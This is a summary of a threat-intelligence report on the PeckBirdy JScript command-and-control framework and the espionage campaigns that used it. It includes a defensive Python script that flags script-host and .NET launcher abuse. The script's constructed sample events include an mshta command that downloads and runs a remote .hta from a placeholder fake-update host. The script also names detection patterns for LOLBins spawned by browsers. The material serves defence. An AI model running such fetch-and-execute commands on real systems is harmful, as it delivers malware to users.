China-Backed ‘PeckBirdy’ Takes Flight for Cross-Platform Attacks
Summary
Trend Micro has been tracking a cross-platform JScript command-and-control framework called PeckBirdy since 2023. China-aligned actors used the framework in at least two distinct campaigns — Shadow-Void-044 (targeting Chinese gambling sites) and Shadow-Earth-045 (targeting Asian government entities) — to deliver modular backdoors and perform cyber-espionage.
PeckBirdy is written in Microsoft JScript and is designed to execute across multiple environments by abusing living-off-the-land binaries (LOLBins). Because its code is generated dynamically at runtime and it leaves no persistent file artefacts, traditional endpoint defences struggle to detect it. Researchers observed new modular backdoors (MKDoor and HoloDonut) alongside prior tools such as GrayRabbit, and ancillary techniques including stolen code-signing certificates, Cobalt Strike, a Chrome RCE (CVE-2020-16040), website injections, MSHTA execution and .NET launchers, used for credential harvesting, lateral movement and persistence.
Key Points
- PeckBirdy is a JScript-based, cross-platform C2 framework tracked by Trend Micro since 2023.
- Two separate campaigns (Shadow-Void-044 and Shadow-Earth-045) used PeckBirdy to target gambling sites and government organisations respectively.
- Attackers used website injections and fake Chrome update pages to trick victims into running backdoors such as MKDoor and HoloDonut.
- PeckBirdy leverages LOLBins/LOTL techniques and runtime-injected JavaScript, leaving few persistent artefacts and complicating detection.
- Observed tooling included stolen code-signing certificates, Cobalt Strike, GrayRabbit, a Chrome RCE (CVE-2020-16040) and .NET/MSHTA-based execution paths.
- Some infrastructure overlaps point to possible links with known China-aligned groups (Earth Baxia, UNC3569) but attribution remains uncertain.
- Trend Micro provides hunting queries and IOCs; continuous monitoring of web-facing infrastructure is advised.
Context and Relevance
This is significant for defenders of web portals, government systems and organisations that host user logins or serve dynamic content. PeckBirdy demonstrates a growing trend: attackers reuse lightweight scripting frameworks and LOLBins to operate across platforms while avoiding file-based signatures. The technique widens the attacker playbook beyond platform-specific malware, increasing the risk to organisations that rely on browser-based interactions and third-party web content.
For security teams, the practical takeaways are to prioritise monitoring for runtime script injection, suspicious MSHTA/.NET launches, anomalous network connections to known C2 domains, and signs of credential harvesting on login pages. Incorporate Trend Micro’s provided IOCs and hunting queries into detection workflows where possible.
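As an added illustration of the monitoring advice above (this is example code written for this summary, not Trend Micro's hunting queries or any code from the report), the script below triages constructed process-creation and network events for three of the signals named: script hosts such as mshta.exe launched with a remote or inline payload, script hosts or .NET launchers spawned directly by a browser (the fake Chrome update lure), and connections or command lines that reference a domain on a C2 watch list. Every log line, path and domain is made up, and the watch list uses placeholder `.invalid` names where a real deployment would load the vendor's published IOCs.

```python
"""
Constructed triage example: flag LOTL script-host activity and C2 watch-list
hits in simple key=value event lines. All sample data below is fabricated.
"""
import re
from dataclasses import dataclass

# Placeholder watch list (constructed); populate from published IOCs in practice.
C2_WATCHLIST = {"c2.example.invalid", "update-chrome.example.invalid"}

# Binaries the write-up associates with MSHTA / script / .NET launcher execution.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
DOTNET_LAUNCHERS = {"msbuild.exe", "installutil.exe", "regasm.exe", "regsvcs.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}

# Arguments that hand a script host a remote URL or an inline script body.
REMOTE_OR_INLINE = re.compile(r"^(https?:|javascript:|vbscript:)", re.IGNORECASE)
URL_HOST = re.compile(r'https?://([^/\s:"]+)', re.IGNORECASE)
KV = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Constructed Sysmon-style events (not real telemetry).
SAMPLE_EVENTS = [
    'type=process parent="C:\\Program Files\\Google\\Chrome\\chrome.exe" '
    'image="C:\\Windows\\System32\\mshta.exe" '
    'cmdline="mshta.exe https://update-chrome.example.invalid/update.hta"',
    'type=process parent="C:\\Windows\\explorer.exe" '
    'image="C:\\Windows\\System32\\mshta.exe" '
    'cmdline="mshta.exe C:\\Users\\u\\AppData\\Local\\Temp\\setup.hta"',
    'type=process parent="C:\\Windows\\explorer.exe" '
    'image="C:\\Windows\\System32\\notepad.exe" cmdline="notepad.exe"',
    'type=process parent="C:\\Program Files\\Google\\Chrome\\chrome.exe" '
    'image="C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe" '
    'cmdline="MSBuild.exe stage.xml"',
    'type=network image="C:\\Windows\\System32\\wscript.exe" dest=c2.example.invalid:443',
    'type=network image="C:\\Program Files\\Google\\Chrome\\chrome.exe" dest=www.example.com:443',
]


@dataclass(frozen=True)
class Finding:
    index: int   # position of the event in the input list
    rule: str    # which detection rule fired
    line: str    # the raw event, for analyst review


def _parse(line: str) -> dict:
    """Turn 'key=value' / key="quoted value" pairs into a dict."""
    return {k: v.strip('"') for k, v in KV.findall(line)}


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def _watchlisted_hosts(text: str) -> set:
    """Hostnames from any URL in the text that appear on the watch list."""
    return {h.lower() for h in URL_HOST.findall(text)} & C2_WATCHLIST


def triage(lines) -> list:
    """Apply the three rules to each event and return every Finding."""
    findings = []
    for i, line in enumerate(lines):
        ev = _parse(line)
        image = _basename(ev.get("image", ""))
        if ev.get("type") == "process":
            parent = _basename(ev.get("parent", ""))
            args = ev.get("cmdline", "").split()[1:]
            if image in SCRIPT_HOSTS and any(REMOTE_OR_INLINE.match(a) for a in args):
                findings.append(Finding(i, "script_host_remote_payload", line))
            if image in SCRIPT_HOSTS | DOTNET_LAUNCHERS and parent in BROWSERS:
                findings.append(Finding(i, "lolbin_spawned_by_browser", line))
            if _watchlisted_hosts(ev.get("cmdline", "")):
                findings.append(Finding(i, "c2_watchlist_hit", line))
        elif ev.get("type") == "network":
            host = ev.get("dest", "").rsplit(":", 1)[0].lower()
            if host in C2_WATCHLIST:
                findings.append(Finding(i, "c2_watchlist_hit", line))
    return findings


def rules_for(lines) -> dict:
    """Map event index -> set of rule names that fired, for quick review."""
    out = {}
    for f in triage(lines):
        out.setdefault(f.index, set()).add(f.rule)
    return out


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f.rule}] event {f.index}: {f.line}")
```

The rules are deliberately narrow: a local `.hta` run from Explorer (event 1) is not flagged on its own, because that pattern is common in legitimate administration, whereas a script host receiving a URL, any script host or .NET launcher parented by a browser, and any reference to a watch-listed domain are each rare enough to be worth an analyst's time. Real telemetry should be fed from your EDR or Sysmon pipeline rather than the constructed lines here.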
Why should I read this?
Quick and dirty: if you look after websites, government portals or user logins, this one matters. PeckBirdy is lightweight, sneaky and works across environments — so it can slip past usual defences. Reading this saves you time by flagging what to hunt for (injected scripts, MSHTA launches, odd C2 traffic) before someone else finds the hole.
Author style
Punchy — this is an important technical alert for defenders. The write-up cuts to the chase: a cross-platform JScript C2 plus new modular backdoors equals elevated risk. If you manage detection or incident response, treat the indicators and monitoring advice as high priority.
